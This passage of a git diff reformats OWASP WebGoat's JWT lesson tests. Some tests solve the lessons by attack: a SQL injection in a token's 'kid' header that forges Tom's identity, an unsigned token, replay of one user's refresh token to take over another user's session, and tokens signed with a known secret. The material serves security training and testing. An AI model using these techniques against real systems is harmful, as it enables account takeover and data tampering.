-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
index 3fadcb10c..1c903c351 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
@@ -1,71 +1,74 @@
 package org.owasp.webgoat.lessons.jwt;
 
-import io.jsonwebtoken.Jwts;
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.jwt.JWT;
-import org.owasp.webgoat.lessons.jwt.JWTFinalEndpoint;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.util.Date;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.concurrent.TimeUnit;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import io.jsonwebtoken.Jwts;
+import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.concurrent.TimeUnit;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class JWTFinalEndpointTest extends LessonTest {
 
-    private static final String TOKEN_JERRY = "eyJraWQiOiJ3ZWJnb2F0X2tleSIsImFsZyI6IkhTNTEyIn0.eyJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImVtYWlsIjoiamVycnlAd2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IkplcnJ5In0.xBc5FFwaOcuxjdr_VJ16n8Jb7vScuaZulNTl66F2MWF1aBe47QsUosvbjWGORNcMPiPNwnMu1Yb0WZVNrp2ZXA";
+  private static final String TOKEN_JERRY =
+      "eyJraWQiOiJ3ZWJnb2F0X2tleSIsImFsZyI6IkhTNTEyIn0.eyJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImVtYWlsIjoiamVycnlAd2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IkplcnJ5In0.xBc5FFwaOcuxjdr_VJ16n8Jb7vScuaZulNTl66F2MWF1aBe47QsUosvbjWGORNcMPiPNwnMu1Yb0WZVNrp2ZXA";
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new JWT());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new JWT());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void solveAssignment() throws Exception {
-        String key = "deletingTom";
-        Map<String, Object> claims = new HashMap<>();
-        claims.put("username", "Tom");
-        String token = Jwts.builder()
-                .setHeaderParam("kid", "hacked' UNION select '" + key + "' from INFORMATION_SCHEMA.SYSTEM_USERS --")
-                .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
-                .setClaims(claims)
-                .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, key)
-                .compact();
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/final/delete")
-                .param("token", token)
-                .content(""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+  @Test
+  public void solveAssignment() throws Exception {
+    String key = "deletingTom";
+    Map<String, Object> claims = new HashMap<>();
+    claims.put("username", "Tom");
+    String token =
+        Jwts.builder()
+            .setHeaderParam(
+                "kid", "hacked' UNION select '" + key + "' from INFORMATION_SCHEMA.SYSTEM_USERS --")
+            .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
+            .setClaims(claims)
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, key)
+            .compact();
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/final/delete").param("token", token).content(""))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void withJerrysKeyShouldNotSolveAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/final/delete")
+  @Test
+  public void withJerrysKeyShouldNotSolveAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/final/delete")
                 .param("token", TOKEN_JERRY)
                 .content(""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-final-jerry-account"))));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback", CoreMatchers.is(messages.getMessage("jwt-final-jerry-account"))));
+  }
 
-    @Test
-    public void shouldNotBeAbleToBypassWithSimpleToken() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/final/delete")
+  @Test
+  public void shouldNotBeAbleToBypassWithSimpleToken() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/final/delete")
                 .param("token", ".eyJ1c2VybmFtZSI6IlRvbSJ9.")
                 .content(""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
index 0ecdaa28b..36eb18305 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
@@ -22,192 +22,230 @@
 
 package org.owasp.webgoat.lessons.jwt;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.jwt.JWT;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.http.MediaType;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.MvcResult;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.util.HashMap;
-import java.util.Map;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.owasp.webgoat.lessons.jwt.JWTRefreshEndpoint.PASSWORD;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
+import java.util.HashMap;
+import java.util.Map;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.web.servlet.MvcResult;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class JWTRefreshEndpointTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new JWT());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new JWT());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solveAssignment() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
+  @Test
+  public void solveAssignment() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
 
-        //First login to obtain tokens for Jerry
-        var loginJson = Map.of("user", "Jerry", "password", PASSWORD);
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isOk())
-                .andReturn();
-        Map<String, String> tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
-        String accessToken = tokens.get("access_token");
-        String refreshToken = tokens.get("refresh_token");
+    // First login to obtain tokens for Jerry
+    var loginJson = Map.of("user", "Jerry", "password", PASSWORD);
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.post("/JWT/refresh/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .content(objectMapper.writeValueAsString(loginJson)))
+            .andExpect(status().isOk())
+            .andReturn();
+    Map<String, String> tokens =
+        objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
+    String accessToken = tokens.get("access_token");
+    String refreshToken = tokens.get("refresh_token");
 
-        //Now create a new refresh token for Tom based on Toms old access token and send the refresh token of Jerry
-        String accessTokenTom = "eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
-        Map<String, Object> refreshJson = new HashMap<>();
-        refreshJson.put("refresh_token", refreshToken);
-        result = mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/newToken")
-                .contentType(MediaType.APPLICATION_JSON)
-                .header("Authorization", "Bearer " + accessTokenTom)
-                .content(objectMapper.writeValueAsString(refreshJson)))
-                .andExpect(status().isOk())
-                .andReturn();
-        tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
-        accessTokenTom = tokens.get("access_token");
+    // Now create a new refresh token for Tom based on Toms old access token and send the refresh
+    // token of Jerry
+    String accessTokenTom =
+        "eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
+    Map<String, Object> refreshJson = new HashMap<>();
+    refreshJson.put("refresh_token", refreshToken);
+    result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.post("/JWT/refresh/newToken")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .header("Authorization", "Bearer " + accessTokenTom)
+                    .content(objectMapper.writeValueAsString(refreshJson)))
+            .andExpect(status().isOk())
+            .andReturn();
+    tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
+    accessTokenTom = tokens.get("access_token");
 
-        //Now checkout with the new token from Tom
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout")
+    // Now checkout with the new token from Tom
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/checkout")
                 .header("Authorization", "Bearer " + accessTokenTom))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void checkoutWithTomsTokenFromAccessLogShouldFail() throws Exception {
-        String accessTokenTom = "eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout")
+  @Test
+  public void checkoutWithTomsTokenFromAccessLogShouldFail() throws Exception {
+    String accessTokenTom =
+        "eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/checkout")
                 .header("Authorization", "Bearer " + accessTokenTom))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.output", CoreMatchers.containsString("JWT expired at")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.output", CoreMatchers.containsString("JWT expired at")));
+  }
 
-    @Test
-    public void checkoutWitRandomTokenShouldFail() throws Exception {
-        String accessTokenTom = "eyJhbGciOiJIUzUxMiJ9.eyJpLXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout")
+  @Test
+  public void checkoutWitRandomTokenShouldFail() throws Exception {
+    String accessTokenTom =
+        "eyJhbGciOiJIUzUxMiJ9.eyJpLXQiOjE1MjYxMzE0MTEsImV4cCI6MTUyNjIxNzgxMSwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ.DCoaq9zQkyDH25EcVWKcdbyVfUL4c9D4jRvsqOqvi9iAd4QuqmKcchfbU8FNzeBNF9tLeFXHZLU4yRkq-bjm7Q";
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/checkout")
                 .header("Authorization", "Bearer " + accessTokenTom))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+  }
 
-    @Test
-    public void flowForJerryAlwaysWorks() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
+  @Test
+  public void flowForJerryAlwaysWorks() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
 
-        var loginJson = Map.of("user", "Jerry", "password", PASSWORD);
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isOk())
-                .andReturn();
-        Map<String, String> tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
-        String accessToken = tokens.get("access_token");
+    var loginJson = Map.of("user", "Jerry", "password", PASSWORD);
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.post("/JWT/refresh/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .content(objectMapper.writeValueAsString(loginJson)))
+            .andExpect(status().isOk())
+            .andReturn();
+    Map<String, String> tokens =
+        objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
+    String accessToken = tokens.get("access_token");
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/checkout")
                 .header("Authorization", "Bearer " + accessToken))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", is("User is not Tom but Jerry, please try again")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.feedback", is("User is not Tom but Jerry, please try again")));
+  }
 
-    @Test
-    public void loginShouldNotWorkForJerryWithWrongPassword() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
+  @Test
+  public void loginShouldNotWorkForJerryWithWrongPassword() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
 
-        var loginJson = Map.of("user", "Jerry", "password", PASSWORD + "wrong");
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
+    var loginJson = Map.of("user", "Jerry", "password", PASSWORD + "wrong");
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/login")
                 .contentType(MediaType.APPLICATION_JSON)
                 .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isUnauthorized());
-    }
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void loginShouldNotWorkForTom() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
+  @Test
+  public void loginShouldNotWorkForTom() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
 
-        var loginJson = Map.of("user", "Tom", "password", PASSWORD);
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
+    var loginJson = Map.of("user", "Tom", "password", PASSWORD);
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/login")
                 .contentType(MediaType.APPLICATION_JSON)
                 .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isUnauthorized());
-    }
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void newTokenShouldWorkForJerry() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
-        Map<String, Object> loginJson = new HashMap<>();
-        loginJson.put("user", "Jerry");
-        loginJson.put("password", PASSWORD);
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isOk())
-                .andReturn();
-        Map<String, String> tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
-        String accessToken = tokens.get("access_token");
-        String refreshToken = tokens.get("refresh_token");
+  @Test
+  public void newTokenShouldWorkForJerry() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
+    Map<String, Object> loginJson = new HashMap<>();
+    loginJson.put("user", "Jerry");
+    loginJson.put("password", PASSWORD);
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.post("/JWT/refresh/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .content(objectMapper.writeValueAsString(loginJson)))
+            .andExpect(status().isOk())
+            .andReturn();
+    Map<String, String> tokens =
+        objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
+    String accessToken = tokens.get("access_token");
+    String refreshToken = tokens.get("refresh_token");
 
-        var refreshJson = Map.of("refresh_token", refreshToken);
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/newToken")
+    var refreshJson = Map.of("refresh_token", refreshToken);
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/newToken")
                 .contentType(MediaType.APPLICATION_JSON)
                 .header("Authorization", "Bearer " + accessToken)
                 .content(objectMapper.writeValueAsString(refreshJson)))
-                .andExpect(status().isOk());
-    }
+        .andExpect(status().isOk());
+  }
 
-    @Test
-    public void unknownRefreshTokenShouldGiveUnauthorized() throws Exception {
-        ObjectMapper objectMapper = new ObjectMapper();
-        Map<String, Object> loginJson = new HashMap<>();
-        loginJson.put("user", "Jerry");
-        loginJson.put("password", PASSWORD);
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .content(objectMapper.writeValueAsString(loginJson)))
-                .andExpect(status().isOk())
-                .andReturn();
-        Map<String, String> tokens = objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
-        String accessToken = tokens.get("access_token");
+  @Test
+  public void unknownRefreshTokenShouldGiveUnauthorized() throws Exception {
+    ObjectMapper objectMapper = new ObjectMapper();
+    Map<String, Object> loginJson = new HashMap<>();
+    loginJson.put("user", "Jerry");
+    loginJson.put("password", PASSWORD);
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.post("/JWT/refresh/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .content(objectMapper.writeValueAsString(loginJson)))
+            .andExpect(status().isOk())
+            .andReturn();
+    Map<String, String> tokens =
+        objectMapper.readValue(result.getResponse().getContentAsString(), Map.class);
+    String accessToken = tokens.get("access_token");
 
-        var refreshJson = Map.of("refresh_token", "wrong_refresh_token");
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/newToken")
+    var refreshJson = Map.of("refresh_token", "wrong_refresh_token");
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/refresh/newToken")
                 .contentType(MediaType.APPLICATION_JSON)
                 .header("Authorization", "Bearer " + accessToken)
                 .content(objectMapper.writeValueAsString(refreshJson)))
-                .andExpect(status().isUnauthorized());
-    }
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void noTokenWhileCheckoutShouldReturn401() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout"))
-                .andExpect(status().isUnauthorized());
-    }
+  @Test
+  public void noTokenWhileCheckoutShouldReturn401() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/refresh/checkout"))
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void noTokenWhileRequestingNewTokenShouldReturn401() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/newToken"))
-                .andExpect(status().isUnauthorized());
-    }
+  @Test
+  public void noTokenWhileRequestingNewTokenShouldReturn401() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/refresh/newToken"))
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void noTokenWhileLoginShouldReturn401() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login"))
-                .andExpect(status().isUnauthorized());
-    }
+  @Test
+  public void noTokenWhileLoginShouldReturn401() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/refresh/login"))
+        .andExpect(status().isUnauthorized());
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
index b99b9f828..4c512ac22 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
@@ -22,23 +22,6 @@
 
 package org.owasp.webgoat.lessons.jwt;
 
-import io.jsonwebtoken.Claims;
-import io.jsonwebtoken.Jwts;
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.jwt.JWT;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.time.Duration;
-import java.time.Instant;
-import java.util.Date;
-
 import static io.jsonwebtoken.SignatureAlgorithm.HS512;
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
@@ -46,94 +29,114 @@ import static org.owasp.webgoat.lessons.jwt.JWTSecretKeyEndpoint.JWT_SECRET;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import io.jsonwebtoken.Claims;
+import io.jsonwebtoken.Jwts;
+import java.time.Duration;
+import java.time.Instant;
+import java.util.Date;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class JWTSecretKeyEndpointTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new JWT());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new JWT());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    private Claims createClaims(String username) {
-        Claims claims = Jwts.claims();
-        claims.put("admin", "true");
-        claims.put("user", "Tom");
-        claims.setExpiration(Date.from(Instant.now().plus(Duration.ofDays(1))));
-        claims.setIssuedAt(Date.from(Instant.now().plus(Duration.ofDays(1))));
-        claims.setIssuer("iss");
-        claims.setAudience("aud");
-        claims.setSubject("sub");
-        claims.put("username", username);
-        claims.put("Email", "webgoat@webgoat.io");
-        claims.put("Role", new String[]{"user"});
-        return claims;
-    }
+  private Claims createClaims(String username) {
+    Claims claims = Jwts.claims();
+    claims.put("admin", "true");
+    claims.put("user", "Tom");
+    claims.setExpiration(Date.from(Instant.now().plus(Duration.ofDays(1))));
+    claims.setIssuedAt(Date.from(Instant.now().plus(Duration.ofDays(1))));
+    claims.setIssuer("iss");
+    claims.setAudience("aud");
+    claims.setSubject("sub");
+    claims.put("username", username);
+    claims.put("Email", "webgoat@webgoat.io");
+    claims.put("Role", new String[] {"user"});
+    return claims;
+  }
 
-    @Test
-    public void solveAssignment() throws Exception {
-        Claims claims = createClaims("WebGoat");
-        String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
+  @Test
+  public void solveAssignment() throws Exception {
+    Claims claims = createClaims("WebGoat");
+    String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void solveAssignmentWithLowercase() throws Exception {
-        Claims claims = createClaims("webgoat");
-        String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
+  @Test
+  public void solveAssignmentWithLowercase() throws Exception {
+    Claims claims = createClaims("webgoat");
+    String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void oneOfClaimIsMissingShouldNotSolveAssignment() throws Exception {
-        Claims claims = createClaims("WebGoat");
-        claims.remove("aud");
-        String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
+  @Test
+  public void oneOfClaimIsMissingShouldNotSolveAssignment() throws Exception {
+    Claims claims = createClaims("WebGoat");
+    claims.remove("aud");
+    String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-secret-claims-missing"))));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback", CoreMatchers.is(messages.getMessage("jwt-secret-claims-missing"))));
+  }
 
-    @Test
-    public void incorrectUser() throws Exception {
-        Claims claims = createClaims("Tom");
-        String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
+  @Test
+  public void incorrectUser() throws Exception {
+    Claims claims = createClaims("Tom");
+    String token = Jwts.builder().setClaims(claims).signWith(HS512, JWT_SECRET).compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-secret-incorrect-user", "default", "Tom"))));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(
